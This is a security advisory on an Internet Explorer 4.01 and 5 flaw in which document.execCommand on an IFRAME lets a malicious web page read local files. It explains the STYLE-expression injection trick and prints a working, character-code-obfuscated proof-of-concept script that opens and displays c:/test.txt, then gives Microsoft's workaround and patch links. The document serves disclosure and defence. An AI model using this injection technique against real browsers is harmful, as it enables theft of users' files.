COMMAND
Internet Explorer
SYSTEMS AFFECTED
Internet Explorer 4.01 (versions prior to SP2), 5
PROBLEM
The IE 5 security model normally restricts the
Document.ExecCommand() method to prevent it from taking
inappropriate action on a user's computer. However, at least one
of these restrictions is not present if the method is invoked on
an IFRAME. This could allow a malicious web site operator to read
the contents of files on visiting users' computers, if he or she
knew the name of the file and the folder in which it resided.
The vulnerability would not allow the malicious user to list the
contents of folders, create, modify or delete files, or to usurp
any administrative control over the machine.
Originally this was found by Georgi Guninski. It is also possible
in some cases to read files behind fiewall. The problem is the
combination of IFRAME and document.execCommand. Normally, you
cannot use execCommand on an IFRAME from another domain. But if
you do: "IFRAME.focus(); document.execCommand" then command will
be executed in the IFRAME (some commands do not work in this way,
but some do and that is enough). So, we create an IFRAME with
SRC="file://c:/test.txt" and inject JavaScript code in it. When
the JavaScript code is executed, it is executed in the security
context of the IFRAME - the "file:" protocol. The injection is
done using the "InsertParagraph" command (guess other commands
will do) which sets the ID of the paragraph. But if you place a
" in the ID, then a STYLE tag may be inserted also. The
JavaScript code is injected using the STYLE tag:
STYLE="left:expression(eval(JSCode))"
This vulnerability may be exploited using HTML email message or a
newsgroup posting. The code is:
<SCRIPT>
alert("Create text file c:\\test.txt and it will be read");
function f()
{
I1.focus();
document.execCommand("selectAll");
document.execCommand("InsertParagraph",false,">\"STYLE='left:expression(eval(String.fromCharCode(97,61,119,105,110,100,111,119,46,111,112,101,110,40,39,102,105,108,101,58,47,47,99,58,47,116,101,115,116,46,116,120,116,39,41,59,97,108,101,114,116,40,97,46,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,84,101,120,116,41)));'");
}
setTimeout('f()',2000);
</SCRIPT>
<IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME>
Demonstration is available at:
http://www.nat.bg/~joro/execcommand.html
SOLUTION
As an interim step while the patch is under development, Microsoft
recommends that customers add sites that they trust to the Trusted
Zone, and disable Active Scripting in the Internet Zone. This
will provide full functionality for all trusted sites, while
preventing untrusted sites from being able to exploit this
vulnerability.
Internet Explorer 4.01 users should apply IE 4.01 Service Pack 2
at:
http://www.microsoft.com/windows/ie/download/windows.htm
Internet Explorer 5 should apply that patch for this vulnerability
at:
Intel Platform: ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/x86/q243638.exe
Alpha Platform: ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/Alpha/q243638.exe
The IE5 patch also includes the previously-released fix for the
"Download Behavior" vulnerability. The IE5 patch also will be
available shortly at http://windowsupdate.microsoft.com.